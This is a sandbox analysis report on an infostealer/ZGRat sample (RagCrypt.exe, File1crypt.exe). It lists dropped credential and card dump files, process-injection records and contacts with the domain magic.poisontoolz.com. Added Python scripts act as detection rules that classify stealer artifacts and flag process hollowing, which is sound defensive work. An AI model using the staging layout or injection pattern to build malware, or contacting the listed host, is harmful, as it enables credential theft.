memory/2236-2008-0x0000000005000000-0x000000000504C000-memory.dmp

memory/2236-2002-0x0000000002510000-0x0000000002511000-memory.dmp

C:\Users\Admin\AppData\Roaming\File1crypt.exe

MD5 273a0cfac73dc5c9525fe0b5d3b21dee
SHA1 e29164a17369cbc87a21fac0720249c288ab3097
SHA256 3708f0d7d78b4e11fd45fcadc6dc83105870bb8ec92eea2faa00e08989fca735
SHA512 337937ae23f2c7282e9a388791cb73857b22e766153e7dbd90b1fe69c66881f745218fe534baecca6a54e1a06d653753de52618ed965bbd24ff4c48ce8d8ed0f

memory/2348-2028-0x0000000072170000-0x0000000072920000-memory.dmp

memory/2348-2031-0x00000000053C0000-0x0000000005452000-memory.dmp

memory/2348-2037-0x0000000002C50000-0x0000000002C60000-memory.dmp

memory/2348-2026-0x0000000000400000-0x0000000000578000-memory.dmp

memory/2236-2025-0x0000000072170000-0x0000000072920000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\File1crypt.exe.log

MD5 4a911455784f74e368a4c2c7876d76f4
SHA1 a1700a0849ffb4f26671eb76da2489946b821c34
SHA256 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c
SHA512 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d

memory/2348-2069-0x0000000006330000-0x000000000633A000-memory.dmp

memory/3396-2079-0x0000000004490000-0x0000000004491000-memory.dmp

memory/3396-2080-0x0000000006480000-0x0000000006622000-memory.dmp

memory/3396-2078-0x0000000072170000-0x0000000072920000-memory.dmp

memory/2112-2086-0x0000000000400000-0x0000000000592000-memory.dmp

memory/2112-2087-0x0000000072170000-0x0000000072920000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Data\Passwords.txt

MD5 36f6acc2229073f5bb4074cee73d1d5b
SHA1 b2adbb44350d984dff40c15fcbbeb3379c7ec0e5
SHA256 8a947e0921f9cfada15c19a72f0ff31b38ad4602106c6ee95685d61c223c9a35
SHA512 da8b627bd674ceb0da7e30ba543ab82ab694d3f6e0474b48ca343ee74e20147440d2205b6ce66f5caa2a39061dedd2ca4146e263fac9f146a228c5b5cba4aaad

C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt

MD5 412ec159e4b14be1ca93db473e80acc2
SHA1 8909b6f7fc8715a749270b6ceb8f05f823f59fd3
SHA256 eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe
SHA512 a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4

C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt

MD5 ae0f7fab163139c661e576fe0af08651
SHA1 7545ab94360fd93f2209021b4cecabb92592be27
SHA256 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657
SHA512 a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b

C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt

MD5 0f5f7a38759e578c92bcf62c45d80b8a
SHA1 211e70ede55cce5bf67f685d85cbd030a8517d2b
SHA256 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc
SHA512 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d

C:\Users\Admin\AppData\Local\Temp\Data\Autofills.txt

MD5 6be6fdca0cfa94635b8689b2b0bf2bee
SHA1 379c61029b5443c3d3df7c770423e40618b36d15
SHA256 5bc3a7ced261f235f4a30797ad96f803c9e022a95ad6bc7fedc06d0fd2a0abeb
SHA512 7955fb48977c971563b10420e379ebea01e42582a8dfe2719ec756dda7e757168031a58a3c9fef061c0abb6c799579f7c8b46de4fc5b4ab3519d735092848cd8

memory/3396-2088-0x0000000072170000-0x0000000072920000-memory.dmp

memory/2348-2084-0x0000000008B80000-0x0000000008BD0000-memory.dmp

C:\Users\Admin\AppData\Roaming\File2crypt.exe

MD5 194abb15d1b07f052be0b18ffa238050
SHA1 8ec9ff9eeb88645f6e6b538c3163cc4894f82ec2
SHA256 e8f4ee6351764bc703f118df85c629084f85bd325bcc1930f0982461938a4ecb
SHA512 52c5a71a023f290962a445bc5c6befd0ce8f7310b6c9185022c6b520a07a61f846b684fa1d7533ada37deeb868a59cd0997d9cd1459f32957b527701ca296805

memory/2112-2121-0x00000000057E0000-0x00000000057F0000-memory.dmp

memory/2348-2129-0x0000000072170000-0x0000000072920000-memory.dmp

memory/2112-2140-0x0000000005CF0000-0x0000000005CF8000-memory.dmp

memory/2112-2139-0x00000000057B0000-0x00000000057D6000-memory.dmp

memory/2112-2138-0x0000000005C60000-0x0000000005CF2000-memory.dmp

memory/2112-2142-0x0000000006C20000-0x0000000006C28000-memory.dmp

memory/2112-2143-0x0000000006C40000-0x0000000006C5E000-memory.dmp

memory/2112-2141-0x0000000006C10000-0x0000000006C1A000-memory.dmp

C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\Process.txt

MD5 e1261b30bcee5ffdb8725793d8247b4e
SHA1 22d3a1dd3d1e2e6351301a87b1d5fc79057ab0df
SHA256 185a74f3aa4672f9b94625d03f8828bbe2d31ad05c825008abdf0e2837921cf7
SHA512 acb1f33e644f1174079e5708bfbeaf4a227f576a07af56a822261edd88bd65965d52ca17bcc92406662ba4807550abc12692614b4adca9affcf697d2a225e0b5

C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\Apps.txt

MD5 b1d58554f33c991f9454f81bf1f6a7a6
SHA1 1a9c0748fbb4c4974315f6a3188ffb5078372de1
SHA256 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c
SHA512 ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6

memory/2112-2332-0x00000000057E0000-0x00000000057F0000-memory.dmp

memory/2112-2334-0x00000000057E0000-0x00000000057F0000-memory.dmp

memory/2112-2337-0x0000000006E90000-0x0000000006F0A000-memory.dmp

C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\Debug.txt

MD5 9f7e8c90c8e4f0e6976a3d69a59e13e6
SHA1 a678403153d4e71bcae97c83c65707d9bcb86bb6
SHA256 9a0344723389aee9269af868fdcd5ae0d22d04eb5e88b656fd146dd143e9a0ce
SHA512 c13cd581b6062c538f2be58e88ec00d518f76e5f0f3870458a51489a4e833f8e7ba8408e58e94038c8dab21c63821d52d181faee1ddbf6128f29bbc545b533ed

memory/2112-2410-0x0000000007140000-0x00000000071F2000-memory.dmp

C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\ProductKey.txt

MD5 71eb5479298c7afc6d126fa04d2a9bde
SHA1 a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256 f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA512 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\Directories\Videos.txt

MD5 1fddbf1169b6c75898b86e7e24bc7c1f
SHA1 d2091060cb5191ff70eb99c0088c182e80c20f8c
SHA256 a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
SHA512 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d

C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\Directories\Startup.txt

MD5 68c93da4981d591704cea7b71cebfb97
SHA1 fd0f8d97463cd33892cc828b4ad04e03fc014fa6
SHA256 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483
SHA512 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402

memory/2112-2412-0x0000000008300000-0x0000000008654000-memory.dmp

C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\msgid.dat

MD5 af6f1933326883369932eff6d98e0098
SHA1 888e43aff1981840211a034ba78e048a48ab3b8a
SHA256 8052615aa0bdf7a250e889aacee4d06c82cd18f01add69f89332d5db3fc1ca21
SHA512 46b87b38eac0122ee226e348288a2acf272fb3d2e68503e20a1572a464e0a0b4b70b0f4225d5188b7c6dd1ba12d237a318fe3b43e9b4abae334b54f5a4a255f7

memory/2112-2430-0x0000000072170000-0x0000000072920000-memory.dmp

memory/2112-2437-0x00000000057E0000-0x00000000057F0000-memory.dmp

memory/2112-2438-0x00000000057E0000-0x00000000057F0000-memory.dmp

memory/2112-2439-0x00000000057E0000-0x00000000057F0000-memory.dmp
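
The file list above is the stealer's output in two layouts: flat browser dumps under %TEMP%\Data (Passwords.txt, CreditCards.txt, Autofills.txt, Histories.txt, Downloads.txt) and a per-host staging tree under %LOCALAPPDATA%\<32 hex characters>\<user>@<host>_<locale>\ with Browsers, System and Directories subfolders, plus msgid.dat at the root of that tree. The CLR_v4.0_32\UsageLogs\File1crypt.exe.log entry is the .NET runtime's usage log, written when a 32-bit managed assembly of that name executes, which pins the dropped File1crypt.exe as a .NET binary. The script below is an added example, not part of the sandbox report: it classifies dropped-file paths by those shapes so the same rule can be run over EDR file-create events. The paths are copied from the list above; the regexes, the category names and the looks_like_stealer threshold are this example's own, and the hex ID, host name and locale are matched by shape rather than hard-coded.

```python
import re
from collections import Counter

# Constructed input: dropped-file paths copied from the behavioral12 file list
# (hashes and memory dumps omitted). The classification rules below are this
# example's own and are not part of the sandbox report.
DROPPED_FILES = [
    r"C:\Users\Admin\AppData\Roaming\File1crypt.exe",
    r"C:\Users\Admin\AppData\Roaming\File2crypt.exe",
    r"C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\File1crypt.exe.log",
    r"C:\Users\Admin\AppData\Local\Temp\Data\Passwords.txt",
    r"C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt",
    r"C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt",
    r"C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\Browsers\Firefox\Bookmarks.txt",
    r"C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\Process.txt",
    r"C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\Directories\Startup.txt",
    r"C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\msgid.dat",
]

# Per-host staging tree: %LOCALAPPDATA%\<32 hex>\<user>@<host>_<locale>\<category>\...
# The ID, user, host and locale are captured by shape, never hard-coded.
STAGING = re.compile(
    r"\\AppData\\Local\\(?P<id>[0-9a-f]{32})\\(?P<user>[^\\@]+)@(?P<host>[^\\_]+)_"
    r"(?P<locale>[A-Za-z]{2}-[A-Za-z]{2})\\(?P<category>[^\\]+)\\(?P<rest>.+)$",
    re.IGNORECASE,
)
# A file directly under the staging root (msgid.dat in the report).
STAGING_ROOT = re.compile(r"\\AppData\\Local\\(?P<id>[0-9a-f]{32})\\(?P<file>[^\\]+)$", re.IGNORECASE)
# Flat browser-data dump in %TEMP%\Data\.
BROWSER_DUMP = re.compile(
    r"\\AppData\\Local\\Temp\\Data\\(?P<artifact>Passwords|CreditCards|Autofills|Histories|Downloads)\.txt$",
    re.IGNORECASE,
)
# .NET runtime usage log: created when a managed assembly runs under that CLR.
CLR_LOG = re.compile(
    r"\\Microsoft\\CLR_v(?P<clr>[\d.]+)_(?P<bits>32|64)\\UsageLogs\\(?P<assembly>[^\\]+)\.log$",
    re.IGNORECASE,
)
# Executable dropped straight into the roaming profile.
ROAMING_EXE = re.compile(r"\\AppData\\Roaming\\(?P<name>[^\\]+\.exe)$", re.IGNORECASE)


def classify(path):
    """Return a dict with a 'kind' key and the fields captured from the path."""
    if m := STAGING.search(path):
        return {"kind": "stealer_staging", **m.groupdict()}
    if m := STAGING_ROOT.search(path):
        return {"kind": "stealer_staging_root", **m.groupdict()}
    if m := BROWSER_DUMP.search(path):
        return {"kind": "browser_dump", "artifact": m["artifact"]}
    if m := CLR_LOG.search(path):
        return {"kind": "clr_usage_log", **m.groupdict()}
    if m := ROAMING_EXE.search(path):
        return {"kind": "roaming_exe", "name": m["name"]}
    return {"kind": "other"}


def summarize(paths):
    """Aggregate a batch of file-create paths into the facts a triage wants:
    how many of each kind, which staging IDs, which user@host, which categories."""
    hits = [classify(p) for p in paths]
    return {
        "kinds": dict(Counter(h["kind"] for h in hits)),
        "staging_ids": {h["id"] for h in hits if h["kind"].startswith("stealer_staging")},
        "victims": {f'{h["user"]}@{h["host"]}' for h in hits if h["kind"] == "stealer_staging"},
        "categories": sorted({h["category"] for h in hits if h["kind"] == "stealer_staging"}),
    }


def looks_like_stealer(summary):
    """Hunt rule (this example's threshold): a per-host staging tree together
    with either a flat browser dump or at least one populated staging category."""
    return bool(summary["staging_ids"]) and (
        summary["kinds"].get("browser_dump", 0) > 0 or bool(summary["categories"])
    )


if __name__ == "__main__":
    s = summarize(DROPPED_FILES)
    for key, value in s.items():
        print(f"{key}: {value}")
    print("stealer pattern:", looks_like_stealer(s))
```

The 32-hex directory name combined with a user@host_locale folder is the strongest of these shapes, since legitimate software rarely keys a directory by the host's own identity. Passwords.txt or CreditCards.txt in %TEMP% is weaker on its own, as any script can drop a file with that name, which is why looks_like_stealer requires the staging tree as well.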

Analysis: behavioral14

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231222-en

Max time kernel

5s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
(34 matches, each recorded as N/A in every column: the rule fired, but the report carries no indicator, process or target for any of them)

ZGRat

rat zgrat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 352 set thread context of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 352 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
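
The two tables above record the same parent PID 352 both writing into a second RagCrypt.exe instance (2524) and then setting its thread context, with a third instance (4212) written to but never resumed that way; behavioral4 below shows the same pattern from Buildcrypt.exe (1000 into 4664) at the end of an mshta.exe to powershell.exe chain that also launches a real AcroRd32.exe. The script below, added here as an example and not part of the sandbox report, parses rows in the form these tables use, reconstructs parent/child lineage from the write edges, and flags a SetThreadContext into a child running the caller's own image as a hollow-and-resume candidate. The row strings are copied from the parts of those tables reproduced on this page, one per distinct edge; the heuristic, the tree approximation and every function name are this example's own.

```python
import re

# Constructed input: one row per distinct parent->child edge, copied from the
# "Suspicious use of WriteProcessMemory" and "Suspicious use of SetThreadContext"
# tables of behavioral14 and behavioral4 as reproduced in this report. The
# sandbox logs every call, so the original tables repeat rows; the parser and
# the heuristic below are this example's own, not the sandbox's.
WRITE_ROWS = [
    r"PID 352 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe",
    r"PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe",
    r"PID 2776 wrote to memory of 952 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
    r"PID 952 wrote to memory of 2116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe",
    r"PID 952 wrote to memory of 1000 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Buildcrypt.exe",
    r"PID 2116 wrote to memory of 3428 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe",
    r"PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe",
]
CONTEXT_ROWS = [
    r"PID 352 set thread context of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe",
    r"PID 1000 set thread context of 4664 N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe C:\Users\Admin\AppData\Roaming\Buildcrypt.exe",
]

# Row grammar: "PID <src> <verb> <dst> N/A <source image> <target image>".
# Image paths contain spaces ("Program Files (x86)"), so the source image is
# taken lazily up to the first ".exe" that is followed by a space.
ROW = re.compile(
    r"^PID (?P<src>\d+) (?P<verb>wrote to memory of|set thread context of) "
    r"(?P<dst>\d+) N/A (?P<src_img>.+?\.exe) (?P<dst_img>.+\.exe)$"
)


def parse_rows(rows):
    """Return de-duplicated (src_pid, dst_pid, src_img, dst_img) edges, in table order."""
    edges, seen = [], set()
    for row in rows:
        m = ROW.match(row)
        if not m:
            raise ValueError(f"unrecognised row: {row!r}")
        edge = (int(m["src"]), int(m["dst"]), m["src_img"], m["dst_img"])
        if edge not in seen:
            seen.add(edge)
            edges.append(edge)
    return edges


def build_tree(edges):
    """Approximate the process tree: the first process seen touching a fresh
    PID is treated as its creator (the sandbox lists rows in creation order)."""
    parent, image = {}, {}
    for src, dst, src_img, dst_img in edges:
        parent.setdefault(dst, src)
        image.setdefault(src, src_img)
        image.setdefault(dst, dst_img)
    return parent, image


def lineage(pid, parent, image):
    """Ancestry of pid as 'image(pid)' strings, root first."""
    chain = []
    while pid is not None:
        name = image[pid].rsplit("\\", 1)[-1]
        chain.append(f"{name}({pid})")
        pid = parent.get(pid)
    return chain[::-1]


def find_self_hollowing(write_edges, context_edges):
    """Flag SetThreadContext into a child running the caller's own image: the
    hollow-and-resume pattern (child created suspended, image overwritten,
    thread context redirected to the new entry point). Also report same-image
    children that were only written to, which on their own are not conclusive."""
    written = {(s, d) for s, d, _, _ in write_edges}
    hits = []
    for src, dst, src_img, dst_img in context_edges:
        if src_img.lower() == dst_img.lower():
            hits.append({"src": src, "dst": dst, "image": src_img,
                         "memory_written": (src, dst) in written})
    resumed = {(h["src"], h["dst"]) for h in hits}
    write_only = sorted((s, d) for s, d, si, di in write_edges
                        if si.lower() == di.lower() and (s, d) not in resumed)
    return hits, write_only


if __name__ == "__main__":
    writes, contexts = parse_rows(WRITE_ROWS), parse_rows(CONTEXT_ROWS)
    parent, image = build_tree(writes + contexts)
    for leaf in (2524, 4664, 3600):
        print(" -> ".join(lineage(leaf, parent, image)))
    hits, write_only = find_self_hollowing(writes, contexts)
    for h in hits:
        print("hollowing candidate:", h)
    print("same-image writes without SetThreadContext:", write_only)
```

The same-image check alone does not decide anything: RdrCEF.exe writing into another RdrCEF.exe (3428 into 3600) is how the Reader's embedded browser engine starts its child processes, and it lands in the write-only list, while the same shape followed by a SetThreadContext from RagCrypt.exe is what marks 352 into 2524. The memory_written flag for 1000 into 4664 is False only because the behavioral4 WriteProcessMemory rows reproduced here stop before that pair.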

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe"

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 90.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
GB 96.17.179.70:80 N/A tcp
GB 104.77.160.28:80 N/A tcp
GB 96.17.179.83:80 N/A tcp
US 8.8.8.8:53 68.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 70.179.17.96.in-addr.arpa udp
GB 104.77.160.28:80 N/A tcp
GB 104.77.160.28:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
N/A 96.16.110.41:443 N/A tcp
N/A 20.223.35.26:443 N/A tcp
N/A 20.223.35.26:443 N/A tcp
GB 96.17.179.55:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
SE 192.229.221.95:80 N/A tcp
SE 192.229.221.95:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
GB 96.17.179.55:80 N/A tcp
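
Most of the table above is not the sample's own traffic: the in-addr.arpa rows are Windows reverse-resolving peers it has talked to, and the rows with no Domain are connections the sandbox could not tie to a name, which cannot be attributed to the sample without a capture. The rows that matter are the forward lookup of magic.poisontoolz.com and the TCP/443 connection to 104.21.10.90 that carries that name. The script below, added here as an example and not part of the sandbox report, parses rows in the table's form, decodes PTR names back to addresses, and separates named from unnamed peers so that only the former become indicators. The rows are copied from the table above (the Domain cell is empty for raw connections; an N/A there is accepted too); the triage rules and function names are this example's own.

```python
import re

# Constructed input: rows copied from the behavioral14 Network table
# (Country Destination Domain Proto). The Domain cell is empty for raw
# connections; N/A is also treated as absent. Triage rules are this example's.
NETWORK_ROWS = [
    "US 8.8.8.8:53 magic.poisontoolz.com udp",
    "US 104.21.10.90:443 magic.poisontoolz.com tcp",
    "US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp",
    "US 8.8.8.8:53 90.10.21.104.in-addr.arpa udp",
    "US 8.8.8.8:53 70.179.17.96.in-addr.arpa udp",
    "GB 96.17.179.70:80 tcp",
    "GB 96.17.179.55:80 tcp",
    "GB 96.17.179.55:80 tcp",
    "N/A 20.223.35.26:443 tcp",
    "SE 192.229.221.95:80 tcp",
]

# Country is a token (N/A allowed); destination is ip:port; domain optional.
ROW = re.compile(
    r"^(?P<cc>\S+) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)"
    r"(?: (?P<domain>\S+))? (?P<proto>tcp|udp)$"
)


def ptr_to_ip(name):
    """Decode a reverse-lookup name: '90.10.21.104.in-addr.arpa' -> '104.21.10.90'.
    PTR names carry the octets in reverse order under in-addr.arpa."""
    suffix = ".in-addr.arpa"
    if not name.lower().endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    return ".".join(reversed(octets)) if len(octets) == 4 else None


def triage(rows):
    """Split the table into names asked for (by the sample or the OS on its
    behalf), peers the OS reverse-resolved, connections tied to a name, and
    bare connections with no name at all."""
    out = {"forward_lookups": set(), "ptr_ips": set(),
           "named_connections": [], "unnamed_connections": []}
    for row in rows:
        m = ROW.match(row)
        if not m:
            raise ValueError(f"unrecognised row: {row!r}")
        ip, port, proto = m["ip"], int(m["port"]), m["proto"]
        domain = None if m["domain"] in (None, "N/A") else m["domain"]
        if domain and domain.lower().endswith(".in-addr.arpa"):
            out["ptr_ips"].add(ptr_to_ip(domain))      # OS reverse-resolving a peer
        elif domain and port == 53:
            out["forward_lookups"].add(domain)         # a name something asked for
        elif domain:
            out["named_connections"].append((ip, port, domain, proto))
        else:
            out["unnamed_connections"].append((ip, port, proto))
    return out


def iocs(result):
    """Indicators worth pivoting on: forward-resolved names and the peers the
    sandbox tied to one. Unnamed peers stay out; without a pcap they cannot be
    separated from the VM's own background traffic."""
    names = set(result["forward_lookups"])
    ips = {ip for ip, _, _, _ in result["named_connections"]}
    return sorted(names | ips)


def reverse_resolved_peers(result):
    """Unnamed connections whose peer the OS also reverse-resolved: the DNS and
    connection rows corroborate each other, which narrows what to look at next."""
    seen = {ip for ip, _, _ in result["unnamed_connections"]}
    return sorted(seen & result["ptr_ips"])


if __name__ == "__main__":
    r = triage(NETWORK_ROWS)
    print("forward lookups:", sorted(r["forward_lookups"]))
    print("named connections:", r["named_connections"])
    print("reverse-resolved peers:", sorted(r["ptr_ips"]))
    print("unnamed connections:", len(r["unnamed_connections"]))
    print("IOCs:", iocs(r))
    print("unnamed peers also reverse-resolved:", reverse_resolved_peers(r))
```

Two of the PTR rows decode to addresses that also appear as connections (104.21.10.90 and 96.17.179.70), which is the kind of cross-check worth running before copying a destination column straight into a blocklist.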

Files

memory/352-1-0x00000000751F0000-0x00000000759A0000-memory.dmp

memory/352-0-0x00000000001A0000-0x00000000001BC000-memory.dmp

